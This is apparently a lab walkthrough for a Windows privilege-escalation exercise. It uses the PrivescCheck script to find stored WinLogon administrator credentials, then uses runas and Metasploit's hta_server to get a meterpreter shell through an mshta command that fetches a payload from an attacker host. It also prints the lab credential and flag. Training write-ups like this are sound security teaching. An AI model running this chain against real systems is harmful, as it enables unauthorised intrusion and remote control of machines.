Name Windows: PrivescCheck

URL https://attackdefense.com/challengedetails?cid=2404

Type Privilege Escalation: Basics

Important Note: This document illustrates all the important steps required to complete this lab.
This is by no means a comprehensive step-by-step solution for this exercise. This is only
provided as a reference to various commands needed to complete this exercise and for your
further research on this topic. Also, note that the IP addresses and domain names might be
different in your lab.

Step 1: Switch to the Victim Machine.

Step 2: Open the powershell.exe terminal to check the current user.

We are running as a student user. We will run the PrivescCheck PowerShell script to find
possible misconfiguration issues that can be leveraged for local privilege escalation.

PrivescCheck:

“Privilege Escalation Enumeration Script for Windows. It also gathers various information that
might be useful for exploitation and/or post-exploitation.”

Source: https://github.com/itm4n/PrivescCheck

Step 3: Switch current folder to PrivescCheck folder C:\Users\student\Desktop\PrivescCheck

Commands: cd C:\Users\student\Desktop\PrivescCheck
ls
Step 4: Running PrivescCheck.ps1 script.

Commands: powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck"

The scan has started and it would take 1-2 minutes to finish.
We have received the report and we can notice that we found WinLogon credentials. Investigate
WinLogon output.
We have found an administrator user credential. i.e administrator:hello_123321

Step 5: We are running a command prompt i.e cmd.exe as an administrator user using
discovered credential and runas.exe

Commands: runas.exe /user:administrator cmd

hello_123321
whoami
We are running cmd.exe as an administrator.

Switch to the Kali Machine

Step 6: Running the hta_server module to gain the meterpreter shell. Start msfconsole.

Commands:
msfconsole -q
use exploit/windows/misc/hta_server
exploit

“This module hosts an HTML Application (HTA) that when opened will run a payload via
Powershell..”

Copy the generated payload i.e “http://10.10.15.2:8080/jxEyD3w.hta” and run it on cmd.exe

with mshta command to gain the meterpreter shell.

Note: You need to execute the below payload on the cmd.exe.

Switch to Victim Machine

Step 7: Gaining a meterpreter shell.

Commands:
Note: You need to use your own Metasploit HTA server link

Payload: mshta.exe http://10.10.15.2:8080/jxEyD3w.hta

We can expect a meterpreter shell.

Step 8: Read the flag.

Commands:
sessions -i 1
cd C:\\Users\\Administrator\\Desktop
dir
cat flag.txt
This reveals the flag to us.

Flag: 2b070a650a92129c2462deae7707b0c5

References

1. Metasploit (https://www.metasploit.com/)
2. HTA Web Server (https://www.rapid7.com/db/modules/exploit/windows/misc/hta_server)
3. Privilege Escalation Enumeration Script for Windows
(https://github.com/itm4n/PrivescCheck)